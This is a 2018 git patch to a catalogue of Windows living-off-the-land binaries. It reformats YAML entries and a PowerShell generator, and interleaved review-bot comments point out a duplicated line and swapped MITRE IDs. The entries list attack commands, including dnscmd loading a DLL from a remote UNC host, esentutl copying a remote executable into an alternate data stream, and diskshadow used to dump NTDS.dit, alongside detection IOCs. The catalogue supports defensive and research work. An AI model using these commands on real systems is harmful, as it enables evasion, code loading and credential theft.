From 37cc1ee83e27b0148d3523426fd8786c93481623 Mon Sep 17 00:00:00 2001 
From: Oddvar Moe Date: Mon, 24 Sep 2018 21:59:43 +0200 Subject: [PATCH] Changed all OSBinaries according to the new template --- Mgmt-Scripts/Draft-MDFromYaml-webportal.ps1 | 22 +++-- OSBinaries/Control.exe.md | 2 +- OSBinaries/Csc.exe.md | 2 +- OSBinaries/Cscript.exe.md | 2 +- yml/{ => LOLUtilz}/OSBinaries/Explorer.yml | 0 yml/{ => LOLUtilz}/OSBinaries/Netsh.yml | 0 yml/{ => LOLUtilz}/OSBinaries/Nltest.yml | 0 yml/{ => LOLUtilz}/OSBinaries/Openwith.yml | 0 yml/{ => LOLUtilz}/OSBinaries/Powershell.yml | 0 yml/{ => LOLUtilz}/OSBinaries/Psr.yml | 0 yml/{ => LOLUtilz}/OSBinaries/Robocopy.yml | 0 yml/OSBinaries/Atbroker.yml | 4 +- yml/OSBinaries/Bash.yml | 4 +- yml/OSBinaries/Bitsadmin.yml | 6 +- yml/OSBinaries/Certutil.yml | 4 +- yml/OSBinaries/Cmdkey.yml | 4 +- yml/OSBinaries/Cmstp.yml | 4 +- yml/OSBinaries/Control.yml | 36 ++++--- yml/OSBinaries/Csc.yml | 40 +++++--- yml/OSBinaries/Cscript.yml | 31 +++--- yml/OSBinaries/Dfsvc.yml | 36 ++++--- yml/OSBinaries/Diskshadow.yml | 38 +++++--- yml/OSBinaries/Dns.yml | 27 ------ yml/OSBinaries/Dnscmd.yml | 35 +++++++ yml/OSBinaries/Esentutl.yml | 59 +++++++++--- yml/OSBinaries/Expand.yml | 51 +++++++--- yml/OSBinaries/Extexport.yml | 31 +++--- yml/OSBinaries/Extrac32.yml | 53 ++++++++--- yml/OSBinaries/Findstr.yml | 59 +++++++++--- yml/OSBinaries/Forfiles.yml | 45 ++++++--- yml/OSBinaries/Gpscript.yml | 42 ++++++--- yml/OSBinaries/Hh.yml | 44 +++++---- yml/OSBinaries/Ie4unit.yml | 35 ++++--- yml/OSBinaries/Ieexec.yml | 43 ++++++--- yml/OSBinaries/Infdefaultinstall.yml | 36 ++++--- yml/OSBinaries/Installutil.yml | 55 +++++++---- yml/OSBinaries/Makecab.yml | 46 ++++++--- yml/OSBinaries/Mavinject.yml | 43 ++++++--- yml/OSBinaries/Msbuild.yml | 57 +++++++---- yml/OSBinaries/Msconfig.yml | 30 +++--- yml/OSBinaries/Msdt.yml | 48 ++++++---- yml/OSBinaries/Mshta.yml | 61 ++++++++---- yml/OSBinaries/Msiexec.yml | 51 +++++++--- yml/OSBinaries/Odbcconf.yml | 38 ++++---- yml/OSBinaries/Pcalua.yml | 44 ++++++--- yml/OSBinaries/Pcwrun.yml 
| 27 ++++-- yml/OSBinaries/Presentationhost.yml | 35 ++++--- yml/OSBinaries/Print.yml | 44 ++++++--- yml/OSBinaries/Reg.yml | 33 ++++--- yml/OSBinaries/Regasm.yml | 50 ++++++---- yml/OSBinaries/Regedit.yml | 38 +++++--- yml/OSBinaries/Register-cimprovider.yml | 29 ++++-- yml/OSBinaries/Regsvcs.yml | 44 ++++++--- yml/OSBinaries/Regsvr32.yml | 58 +++++++++--- yml/OSBinaries/Replace.yml | 41 +++++--- yml/OSBinaries/Rpcping.yml | 40 ++++---- yml/OSBinaries/Rundll32.yml | 68 +++++++++++--- yml/OSBinaries/Runonce.yml | 34 ++++--- yml/OSBinaries/Runscripthelper.yml | 31 ++++-- yml/OSBinaries/Sc.yml | 36 ++++--- yml/OSBinaries/Scriptrunner.yml | 42 ++++++--- yml/OSBinaries/Syncappvpublishingserver.yml | 27 ++++-- yml/OSBinaries/Wab.yml | 38 +++++--- yml/OSBinaries/Wmic.yml | 99 ++++++++++++++------ yml/OSBinaries/Wscript.yml | 30 ++++-- yml/OSBinaries/Xwizard.yml | 34 ++++--- 66 files changed, 1448 insertions(+), 698 deletions(-) rename yml/{ => LOLUtilz}/OSBinaries/Explorer.yml (100%) rename yml/{ => LOLUtilz}/OSBinaries/Netsh.yml (100%) rename yml/{ => LOLUtilz}/OSBinaries/Nltest.yml (100%) rename yml/{ => LOLUtilz}/OSBinaries/Openwith.yml (100%) rename yml/{ => LOLUtilz}/OSBinaries/Powershell.yml (100%) rename yml/{ => LOLUtilz}/OSBinaries/Psr.yml (100%) rename yml/{ => LOLUtilz}/OSBinaries/Robocopy.yml (100%) delete mode 100644 yml/OSBinaries/Dns.yml create mode 100644 yml/OSBinaries/Dnscmd.yml diff --git a/Mgmt-Scripts/Draft-MDFromYaml-webportal.ps1 b/Mgmt-Scripts/Draft-MDFromYaml-webportal.ps1 index 3b242bc..13f903f 100644 --- a/Mgmt-Scripts/Draft-MDFromYaml-webportal.ps1 +++ b/Mgmt-Scripts/Draft-MDFromYaml-webportal.ps1 
@@ -30,11 +30,15 @@ function Convert-YamlToMD "description: $($YamlObject.Description)"| Add-Content $Outfile "function:"| Add-Content $Outfile # Need a category linked to the different things... Execute, Download, AWL-bypass. - " execute:"| Add-Content $Outfile + foreach($cmd in $YamlObject.Commands) { - " - description: $($cmd.description)"| Add-Content $Outfile - " code: $($cmd.command)"| Add-Content $Outfile + " $($cmd.Category):"| Add-Content $Outfile + " - description: $($cmd.Description)"| Add-Content $Outfile + " code: $($cmd.Command)"| Add-Content $Outfile + " code: $($cmd.Command)"| Add-Content $Outfile + " mitreid: $($cmd.MitreID)"| Add-Content $Outfile + " mitrelink: $($cmd.MitreLink)"| Add-Content $Outfile } "resources:"| Add-Content $Outfile foreach($link in $YamlObject.Resources) @@ -108,13 +112,11 @@ function Invoke-GenerateMD #Generate the stuff! #Bins -Invoke-GenerateMD -YmlPath "$mainpath\yml\OSBinaries" -Outpath "c:\tamp\Binaries" -Verbose +#Invoke-GenerateMD -YmlPath "$mainpath\yml\OSBinaries" -Outpath "c:\tamp\Binaries" -Verbose Invoke-GenerateMD -YmlPath "$mainpath\yml\OtherMSBinaries" -Outpath "c:\tamp\OtherMSBinaries" -Verbose -Invoke-GenerateMD -YmlPath "$mainpath\yml\OtherBinaries" -Outpath "c:\tamp\OtherBinaries" -Verbose -# + ##Scripts -Invoke-GenerateMD -YmlPath "$mainpath\yml\OSScripts" -Outpath "c:\tamp\SCripts" -Verbose -Invoke-GenerateMD -YmlPath "$mainpath\yml\OtherScripts" -Outpath "c:\tamp\OtherScripts" -Verbose -# +#Invoke-GenerateMD -YmlPath "$mainpath\yml\OSScripts" -Outpath "c:\tamp\SCripts" -Verbose + ##Libs -Invoke-GenerateMD -YmlPath "$mainpath\yml\OSLibraries" -Outpath "c:\tamp\Libraries" -Verbose \ No newline at end of file +#Invoke-GenerateMD -YmlPath "$mainpath\yml\OSLibraries" -Outpath "c:\tamp\Libraries" -Verbose \ No newline at end of file diff --git a/OSBinaries/Control.exe.md b/OSBinaries/Control.exe.md index db22b70..c7fc0bd 100644 --- a/OSBinaries/Control.exe.md +++ b/OSBinaries/Control.exe.md 
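Review bot: The line `" code: $($cmd.Command)"| Add-Content $Outfile` is emitted twice inside the new Commands loop of Convert-YamlToMD, so every command in the generated Markdown front matter gets a duplicate `code:` key; drop the second occurrence. The loop also writes `" $($cmd.Category):"` once per command, so two commands that share a Category (as the two Compile entries in Csc.yml in this same patch do) produce a repeated category key — if the output is meant to be parsed as YAML, the commands should be grouped by Category before the heading is written. Convert-YamlToMD begins and ends outside the hunk. In the second hunk of this file the `Invoke-GenerateMD ... \yml\OSBinaries` call is commented out while only the OtherMSBinaries call stays active; if that is a temporary toggle, a one-line comment saying so would save the next reader from assuming OSBinaries generation is disabled on purpose.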
@@ -17,4 +17,4 @@ Execute evil.dll which is stored in an Alternate Data Stream (ADS). * C:\Windows\sysWOW64\control.exe * Notes: Thanks to Jimmy - @bohops - + \ No newline at end of file diff --git a/OSBinaries/Csc.exe.md b/OSBinaries/Csc.exe.md index 5b0afe4..8451894 100644 --- a/OSBinaries/Csc.exe.md +++ b/OSBinaries/Csc.exe.md @@ -18,4 +18,4 @@ csc -target:library File.cs * C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Csc.exe * Notes: Thanks to ? - + \ No newline at end of file diff --git a/OSBinaries/Cscript.exe.md b/OSBinaries/Cscript.exe.md index e8483cf..d4c67f2 100644 --- a/OSBinaries/Cscript.exe.md +++ b/OSBinaries/Cscript.exe.md @@ -15,4 +15,4 @@ Use cscript.exe to exectute a Visual Basic script stored in an Alternate Data St * c:\windows\sysWOW64\cscript.exe * Notes: Thanks to Oddvar Moe - @oddvarmoe - + \ No newline at end of file diff --git a/yml/OSBinaries/Explorer.yml b/yml/LOLUtilz/OSBinaries/Explorer.yml similarity index 100% rename from yml/OSBinaries/Explorer.yml rename to yml/LOLUtilz/OSBinaries/Explorer.yml diff --git a/yml/OSBinaries/Netsh.yml b/yml/LOLUtilz/OSBinaries/Netsh.yml similarity index 100% rename from yml/OSBinaries/Netsh.yml rename to yml/LOLUtilz/OSBinaries/Netsh.yml diff --git a/yml/OSBinaries/Nltest.yml b/yml/LOLUtilz/OSBinaries/Nltest.yml similarity index 100% rename from yml/OSBinaries/Nltest.yml rename to yml/LOLUtilz/OSBinaries/Nltest.yml diff --git a/yml/OSBinaries/Openwith.yml b/yml/LOLUtilz/OSBinaries/Openwith.yml similarity index 100% rename from yml/OSBinaries/Openwith.yml rename to yml/LOLUtilz/OSBinaries/Openwith.yml diff --git a/yml/OSBinaries/Powershell.yml b/yml/LOLUtilz/OSBinaries/Powershell.yml similarity index 100% rename from yml/OSBinaries/Powershell.yml rename to yml/LOLUtilz/OSBinaries/Powershell.yml diff --git a/yml/OSBinaries/Psr.yml b/yml/LOLUtilz/OSBinaries/Psr.yml similarity index 100% rename from yml/OSBinaries/Psr.yml rename to yml/LOLUtilz/OSBinaries/Psr.yml 
diff --git a/yml/OSBinaries/Robocopy.yml b/yml/LOLUtilz/OSBinaries/Robocopy.yml similarity index 100% rename from yml/OSBinaries/Robocopy.yml rename to yml/LOLUtilz/OSBinaries/Robocopy.yml diff --git a/yml/OSBinaries/Atbroker.yml b/yml/OSBinaries/Atbroker.yml index 6709551..8909a81 100644 --- a/yml/OSBinaries/Atbroker.yml +++ b/yml/OSBinaries/Atbroker.yml @@ -13,8 +13,8 @@ Commands: MitreLink: https://attack.mitre.org/wiki/Technique/T1218 OperatingSystem: Windows 8, Windows 8.1, Windows 10 Full Path: - - path: C:\Windows\System32\Atbroker.exe - - path: C:\Windows\SysWOW64\Atbroker.exe + - Path: C:\Windows\System32\Atbroker.exe + - Path: C:\Windows\SysWOW64\Atbroker.exe Code Sample: - Code: Detection: diff --git a/yml/OSBinaries/Bash.yml b/yml/OSBinaries/Bash.yml index 8611056..a2feced 100644 --- a/yml/OSBinaries/Bash.yml +++ b/yml/OSBinaries/Bash.yml @@ -21,8 +21,8 @@ Commands: MitreLink: https://attack.mitre.org/wiki/Technique/T1218 OperatingSystem: Windows 10 Full Path: - - path: C:\Windows\System32\bash.exe - - path: C:\Windows\SysWOW64\bash.exe + - Path: C:\Windows\System32\bash.exe + - Path: C:\Windows\SysWOW64\bash.exe Code Sample: - Code: Detection: diff --git a/yml/OSBinaries/Bitsadmin.yml b/yml/OSBinaries/Bitsadmin.yml index 637331a..700a074 100644 --- a/yml/OSBinaries/Bitsadmin.yml +++ b/yml/OSBinaries/Bitsadmin.yml @@ -1,5 +1,5 @@ --- -Name: bitsadmin.exe +Name: Bitsadmin.exe Description: Used for managing background intelligent transfer Author: 'Oddvar Moe' Created: '2018-05-25' @@ -37,8 +37,8 @@ Commands: MitreLink: https://attack.mitre.org/wiki/Technique/T1218 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Full Path: - - path: C:\Windows\System32\bitsadmin.exe - - path: C:\Windows\SysWOW64\bitsadmin.exe + - Path: C:\Windows\System32\bitsadmin.exe + - Path: C:\Windows\SysWOW64\bitsadmin.exe Code Sample: - Code: Detection: diff --git a/yml/OSBinaries/Certutil.yml b/yml/OSBinaries/Certutil.yml index daf8482..9990689 100644 
--- a/yml/OSBinaries/Certutil.yml +++ b/yml/OSBinaries/Certutil.yml @@ -37,8 +37,8 @@ Commands: MitreLink: https://attack.mitre.org/wiki/Technique/T1140 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Full Path: - - path: C:\Windows\System32\certutil.exe - - path: C:\Windows\SysWOW64\certutil.exe + - Path: C:\Windows\System32\certutil.exe + - Path: C:\Windows\SysWOW64\certutil.exe Code Sample: - Code: Detection: diff --git a/yml/OSBinaries/Cmdkey.yml b/yml/OSBinaries/Cmdkey.yml index 045e72d..41ad530 100644 --- a/yml/OSBinaries/Cmdkey.yml +++ b/yml/OSBinaries/Cmdkey.yml @@ -13,8 +13,8 @@ Commands: MitreLink: https://attack.mitre.org/wiki/Technique/T1078 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Full Path: - - path: C:\Windows\System32\cmdkey.exe - - path: C:\Windows\SysWOW64\cmdkey.exe + - Path: C:\Windows\System32\cmdkey.exe + - Path: C:\Windows\SysWOW64\cmdkey.exe Code Sample: - Code: Detection: diff --git a/yml/OSBinaries/Cmstp.yml b/yml/OSBinaries/Cmstp.yml index 895e235..97d216c 100644 --- a/yml/OSBinaries/Cmstp.yml +++ b/yml/OSBinaries/Cmstp.yml @@ -21,8 +21,8 @@ Commands: MitreLink: https://attack.mitre.org/wiki/Technique/T1191 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Full Path: - - path: C:\Windows\System32\cmstp.exe - - path: C:\Windows\SysWOW64\cmstp.exe + - Path: C:\Windows\System32\cmstp.exe + - Path: C:\Windows\SysWOW64\cmstp.exe Code Sample: - Code: Detection: diff --git a/yml/OSBinaries/Control.yml b/yml/OSBinaries/Control.yml index 9c97e39..f22db61 100644 --- a/yml/OSBinaries/Control.yml +++ b/yml/OSBinaries/Control.yml 
@@ -1,21 +1,31 @@ --- Name: Control.exe -Description: Execute, Read ADS -Author: '' +Description: Binary used to launch controlpanel items in Windows +Author: 'Oddvar Moe' Created: '2018-05-25' -Categories: [] Commands: - Command: control.exe c:\windows\tasks\file.txt:evil.dll Description: Execute evil.dll which is stored in an Alternate Data Stream (ADS). + Usecase: Can be used to evade defensive countermeasures or to hide as a persistence mechanism + Category: Alternate data streams + Privileges: User + MitreID: T1196 + MitreLink: https://attack.mitre.org/wiki/Technique/T1196 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Full Path: - - 'C:\Windows\system32\control.exe ' - - 'C:\Windows\sysWOW64\control.exe ' -Code Sample: [] -Detection: [] + - Path: C:\Windows\System32\control.exe + - Path: C:\Windows\SysWOW64\control.exe +Code Sample: +- Code: +Detection: + - IOC: Control.exe executing files from alternate data streams. Resources: - - https://pentestlab.blog/2017/05/24/applocker-bypass-control-panel/ - - https://www.contextis.com/resources/blog/applocker-bypass-registry-key-manipulation/ - - https://bohops.com/2018/01/23/loading-alternate-data-stream-ads-dll-cpl-binaries-to-bypass-applocker/ - - https://twitter.com/bohops/status/955659561008017409 -Notes: Thanks to Jimmy - @bohops - + - Link: https://pentestlab.blog/2017/05/24/applocker-bypass-control-panel/ + - Link: https://www.contextis.com/resources/blog/applocker-bypass-registry-key-manipulation/ + - Link: https://twitter.com/bohops/status/955659561008017409 + - Link: https://docs.microsoft.com/en-us/windows/desktop/shell/executing-control-panel-items + - Link: https://bohops.com/2018/01/23/loading-alternate-data-stream-ads-dll-cpl-binaries-to-bypass-applocker/ +Acknowledgement: + - Person: Jimmy + Handle: '@bohops' +--- \ No newline at end of file diff --git a/yml/OSBinaries/Csc.yml b/yml/OSBinaries/Csc.yml index f90575b..00b3973 100644 --- a/yml/OSBinaries/Csc.yml 
+++ b/yml/OSBinaries/Csc.yml @@ -1,21 +1,35 @@ --- Name: Csc.exe -Description: Compile -Author: '' +Description: Binary file used by .NET to compile C# code +Author: 'Oddvar Moe' Created: '2018-05-25' -Categories: [] Commands: - - Command: csc -out:My.exe File.cs + - Command: csc.exe -out:My.exe File.cs Description: Use CSC.EXE to compile C# code stored in File.cs and output the compiled version to My.exe. + Usecase: Compile attacker code on system. Bypass defensive counter measures. + Category: Compile + Privileges: User + MitreID: T1127 + MitreLink: https://attack.mitre.org/wiki/Technique/T1127 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 - Command: csc -target:library File.cs - Description: '' + Description: Use CSC.EXE to compile C# code stored in File.cs and output the compiled version to a dll file. + Usecase: Compile attacker code on system. Bypass defensive counter measures. + Category: Compile + Privileges: User + MitreID: T1127 + MitreLink: https://attack.mitre.org/wiki/Technique/T1127 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Full Path: - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\Csc.exe - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Csc.exe -Code Sample: [] -Detection: [] + - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Csc.exe + - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Csc.exe +Code Sample: +- Code: +Detection: + - IOC: Csc.exe should normally not run a system unless it is used for development. Resources: - - https://docs.microsoft.com/en-us/dotnet/csharp/language-reference/compiler-options/command-line-building-with-csc-exe - - '' -Notes: Thanks to ? - + - Link: https://docs.microsoft.com/en-us/dotnet/csharp/language-reference/compiler-options/command-line-building-with-csc-exe +Acknowledgement: + - Person: + Handle: +--- \ No newline at end of file diff --git a/yml/OSBinaries/Cscript.yml b/yml/OSBinaries/Cscript.yml index 757ee19..a00b7e3 100644 
--- a/yml/OSBinaries/Cscript.yml +++ b/yml/OSBinaries/Cscript.yml @@ -1,19 +1,28 @@ --- Name: Cscript.exe -Description: Execute, Read ADS -Author: '' +Description: Binary used to execute scripts in Windows +Author: 'Oddvar Moe' Created: '2018-05-25' -Categories: [] Commands: - Command: cscript c:\ads\file.txt:script.vbs Description: Use cscript.exe to exectute a Visual Basic script stored in an Alternate Data Stream (ADS). + Usecase: Can be used to evade defensive countermeasures or to hide as a persistence mechanism + Category: Alternate data streams + Privileges: User + MitreID: T1096 + MitreLink: https://attack.mitre.org/wiki/Technique/T1096 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Full Path: - - c:\windows\system32\cscript.exe - - c:\windows\sysWOW64\cscript.exe -Code Sample: [] -Detection: [] + - Path: C:\Windows\System32\cscript.exe + - Path: C:\Windows\SysWOW64\cscript.exe +Code Sample: +- Code: +Detection: + - IOC: Cscript.exe executing files from alternate data streams Resources: - - https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f - - https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/ -Notes: Thanks to Oddvar Moe - @oddvarmoe - + - Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f + - Link: https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/ +Acknowledgement: + - Person: Oddvar Moe + Handle: '@oddvarmoe' +--- \ No newline at end of file diff --git a/yml/OSBinaries/Dfsvc.yml b/yml/OSBinaries/Dfsvc.yml index 463b03d..4364f31 100644 --- a/yml/OSBinaries/Dfsvc.yml +++ b/yml/OSBinaries/Dfsvc.yml 
@@ -1,19 +1,29 @@ --- Name: Dfsvc.exe -Description: Execute -Author: '' +Description: ClickOnce engine in Windows used by .NET +Author: 'Oddvar Moe' Created: '2018-05-25' -Categories: [] Commands: - - Command: Missing Example - Description: '' + - Command: Missing Example + Description: Missing example + Usecase: Use binary to bypass Application whitelisting + Category: AWL bypass + Privileges: User + MitreID: T1127 + MitreLink: https://attack.mitre.org/wiki/Technique/T1127 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Full Path: - - 'C:\Windows\Microsoft.NET\Framework\v2.0.50727\Dfsvc.exe ' - - 'C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Dfsvc.exe ' - - 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\Dfsvc.exe ' - - 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Dfsvc.exe ' -Code Sample: [] -Detection: [] + - Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\Dfsvc.exe + - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Dfsvc.exe + - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Dfsvc.exe + - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Dfsvc.exe +Code Sample: +- Code: +Detection: + - IOC: Resources: - - https://github.com/api0cradle/ShmooCon-2015/blob/master/ShmooCon-2015-Simple-WLEvasion.pdf -Notes: Thanks to Casey Smith - @subtee + - Link: https://github.com/api0cradle/ShmooCon-2015/blob/master/ShmooCon-2015-Simple-WLEvasion.pdf +Acknowledgement: + - Person: Casey Smith + Handle: '@subtee' +--- \ No newline at end of file diff --git a/yml/OSBinaries/Diskshadow.yml b/yml/OSBinaries/Diskshadow.yml index d57c043..1cfdcb1 100644 --- a/yml/OSBinaries/Diskshadow.yml +++ b/yml/OSBinaries/Diskshadow.yml 
@@ -1,20 +1,36 @@ --- Name: Diskshadow.exe -Description: Execute, Dump NTDS.dit -Author: '' +Description: Diskshadow.exe is a tool that exposes the functionality offered by the volume shadow copy Service (VSS). +Author: 'Oddvar Moe' Created: '2018-05-25' -Categories: [] Commands: - Command: diskshadow.exe /s c:\test\diskshadow.txt Description: Execute commands using diskshadow.exe from a prepared diskshadow script. + Usecase: Use diskshadow to exfiltrate data from VSS such as NTDS.dit + Category: Dump + Privileges: User + MitreID: T1218 + MitreLink: https://attack.mitre.org/wiki/Technique/T1218 + OperatingSystem: Windows server - Command: diskshadow> exec calc.exe - Description: Execute a calc.exe using diskshadow.exe. + Description: Execute commands using diskshadow.exe to spawn child process + Usecase: Use diskshadow to bypass defensive counter measures + Category: Execute + Privileges: User + MitreID: T1003 + MitreLink: https://attack.mitre.org/wiki/Technique/T1003 + OperatingSystem: Windows server Full Path: - - c:\windows\system32\diskshadow.exe - - c:\windows\sysWOW64\diskshadow.exe -Code Sample: [] -Detection: [] + - Path: C:\Windows\System32\diskshadow.exe + - Path: C:\Windows\SysWOW64\diskshadow.exe +Code Sample: +- Code: +Detection: + - IOC: Child process from diskshadow.exe + - IOC: Diskshadow reading input from file Resources: - - https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/ -Notes: Thanks to Jimmy - @bohops - + - Link: https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/ +Acknowledgement: + - Person: Jimmy + Handle: '@bohops' +--- \ No newline at end of file diff --git a/yml/OSBinaries/Dns.yml b/yml/OSBinaries/Dns.yml deleted file mode 100644 index 8afb67b..0000000 --- a/yml/OSBinaries/Dns.yml +++ /dev/null 
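Review bot: The MitreID values on the two Diskshadow.yml commands appear swapped: the `/s c:\test\diskshadow.txt` entry (Category: Dump, use case NTDS.dit exfiltration) carries `MitreID: T1218`, while the `exec calc.exe` entry (Category: Execute) carries `MitreID: T1003`. Elsewhere in this patch T1218 is the id used for execution entries (Atbroker, Bash, Extexport) and T1003 is the credential-dumping technique, so the Dump entry should read `MitreID: T1003` with `MitreLink: https://attack.mitre.org/wiki/Technique/T1003` and the Execute entry T1218. The second IOC, `Diskshadow reading input from file`, would be more actionable if it named the switch that the command itself uses, e.g. `IOC: Diskshadow.exe launched with /s and a script file argument`.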
@@ -1,27 +0,0 @@ ---- -Name: Dnscmd.exe -Description: Execute -Author: '' -Created: '2018-05-25' -Categories: [] -Commands: - - Command: dnscmd.exe dc1.lab.int /config /serverlevelplugindll \\192.168.0.149\dll\wtf.dll - Description: 'Adds a specially crafted DLL as a plug-in of the DNS Service.' -Full Path: - - c:\windows\system32\Dnscmd.exe - - c:\windows\sysWOW64\Dnscmd.exe -Code Sample: [] -Detection: [] -Resources: - - https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83 - - https://blog.3or.de/hunting-dns-server-level-plugin-dll-injection.html - - https://github.com/dim0x69/dns-exe-persistance/tree/master/dns-plugindll-vcpp - - https://twitter.com/Hexacorn/status/994000792628719618 - - http://www.labofapenetrationtester.com/2017/05/abusing-dnsadmins-privilege-for-escalation-in-active-directory.html -Notes: | - This command must be run on a DC by a user that is at least a member of the DnsAdmins group. See the refference links for DLL details. - Thanks to Shay Ber - ?, - Dimitrios Slamaris - @dim0x69, - Nikhil SamratAshok, - Mittal - @nikhil_mitt - diff --git a/yml/OSBinaries/Dnscmd.yml b/yml/OSBinaries/Dnscmd.yml new file mode 100644 index 0000000..835c371 --- /dev/null +++ b/yml/OSBinaries/Dnscmd.yml 
@@ -0,0 +1,35 @@ +--- +Name: Dnscmd.exe +Description: A command-line interface for managing DNS servers +Author: 'Oddvar Moe' +Created: '2018-05-25' +Commands: + - Command: dnscmd.exe dc1.lab.int /config /serverlevelplugindll \\192.168.0.149\dll\wtf.dll + Description: Adds a specially crafted DLL as a plug-in of the DNS Service. This command must be run on a DC by a user that is at least a member of the DnsAdmins group. See the reference links for DLL details. + Usecase: Remotly inject dll to dns server + Category: Execute + Privileges: DNS admin + MitreID: T1035 + MitreLink: https://attack.mitre.org/wiki/Technique/T1035 + OperatingSystem: Windows server +Full Path: + - Path: C:\Windows\System32\Dnscmd.exe + - Path: C:\Windows\SysWOW64\Dnscmd.exe +Code Sample: +- Code: +Detection: + - IOC: Dnscmd.exe loading dll from UNC path +Resources: + - Link: https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83 + - Link: https://blog.3or.de/hunting-dns-server-level-plugin-dll-injection.html + - Link: https://github.com/dim0x69/dns-exe-persistance/tree/master/dns-plugindll-vcpp + - Link: https://twitter.com/Hexacorn/status/994000792628719618 + - Link: http://www.labofapenetrationtester.com/2017/05/abusing-dnsadmins-privilege-for-escalation-in-active-directory.html +Acknowledgement: + - Person: Shay Ber + Handle: + - Person: Dimitrios Slamaris + Handle: '@dim0x69' + - Person: Nikhil SamratAshok + Handle: '@nikhil_mitt' +--- \ No newline at end of file diff --git a/yml/OSBinaries/Esentutl.yml b/yml/OSBinaries/Esentutl.yml index 2347837..bc3938d 100644 --- a/yml/OSBinaries/Esentutl.yml +++ b/yml/OSBinaries/Esentutl.yml 
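Review bot: The detection entry `IOC: Dnscmd.exe loading dll from UNC path` names the wrong process: per the command's own Description the DLL is registered as a plug-in of the DNS Service through `/serverlevelplugindll`, so it is the DNS server service on the target DC that loads the DLL, while dnscmd.exe only issues the configuration change (and can do so remotely, as the `dc1.lab.int` argument shows). Consider `IOC: Dnscmd.exe executed with /config /serverlevelplugindll` plus a second entry for the DNS server service loading a DLL from a UNC path. The Description still repeats the required-privilege note that `Privileges: DNS admin` already captures, and `Remotly` in the Usecase is a typo.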
@@ -1,28 +1,59 @@ --- Name: Esentutl.exe -Description: Copy, Download, Write ADS, Read ADS -Author: '' +Description: Binary for working with Microsoft Joint Engine Technology (JET) database +Author: 'Oddvar Moe' Created: '2018-05-25' -Categories: [] Commands: - Command: esentutl.exe /y C:\folder\sourcefile.vbs /d C:\folder\destfile.vbs /o Description: Copies the source VBS file to the destination VBS file. + Usecase: Copies files from A to B + Category: Copy + Privileges: User + MitreID: T1105 + MitreLink: https://attack.mitre.org/wiki/Technique/T1105 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 - Command: esentutl.exe /y C:\ADS\file.exe /d c:\ADS\file.txt:file.exe /o Description: Copies the source EXE to an Alternate Data Stream (ADS) of the destination file. + Usecase: Copy file and hide it in an alternate data stream as a defensive counter measure + Category: Alternate data streams + Privileges: User + MitreID: T1096 + MitreLink: https://attack.mitre.org/wiki/Technique/T1096 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 - Command: esentutl.exe /y C:\ADS\file.txt:file.exe /d c:\ADS\file.exe /o Description: Copies the source Alternate Data Stream (ADS) to the destination EXE. - - Command: esentutl.exe /y \\82.221.113.85\webdav\file.exe /d c:\ADS\file.txt:file.exe /o - Description: Copies the source EXE to the destination Alternate Data Stream (ADS) of the destination file. - - Command: esentutl.exe /y \\82.221.113.85\webdav\file.exe /d c:\ADS\file.exe /o - Description: Copies the source EXE to the destination EXE file. 
+ Usecase: Extract hidden file within alternate data streams + Category: Alternate data streams + Privileges: User + MitreID: T1096 + MitreLink: https://attack.mitre.org/wiki/Technique/T1096 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + - Command: esentutl.exe /y \\192.168.100.100\webdav\file.exe /d c:\ADS\file.txt:file.exe /o + Description: Copies the remote source EXE to the destination Alternate Data Stream (ADS) of the destination file. + Usecase: Copy file and hide it in an alternate data stream as a defensive counter measure + Category: Alternate data streams + Privileges: User + MitreID: T1096 + MitreLink: https://attack.mitre.org/wiki/Technique/T1096 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 - Command: esentutl.exe /y \\live.sysinternals.com\tools\adrestore.exe /d \\otherwebdavserver\webdav\adrestore.exe /o Description: Copies the source EXE to the destination EXE file + Usecase: Use to copy files from one unc path to another + Category: Download + Privileges: User + MitreID: T1096 + MitreLink: https://attack.mitre.org/wiki/Technique/T1096 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Full Path: - - c:\windows\system32\esentutl.exe - - c:\windows\sysWOW64\esentutl.exe -Code Sample: [] -Detection: [] + - Path: C:\Windows\System32\esentutl.exe + - Path: C:\Windows\SysWOW64\esentutl.exe +Code Sample: +- Code: +Detection: + - IOC: Resources: - - 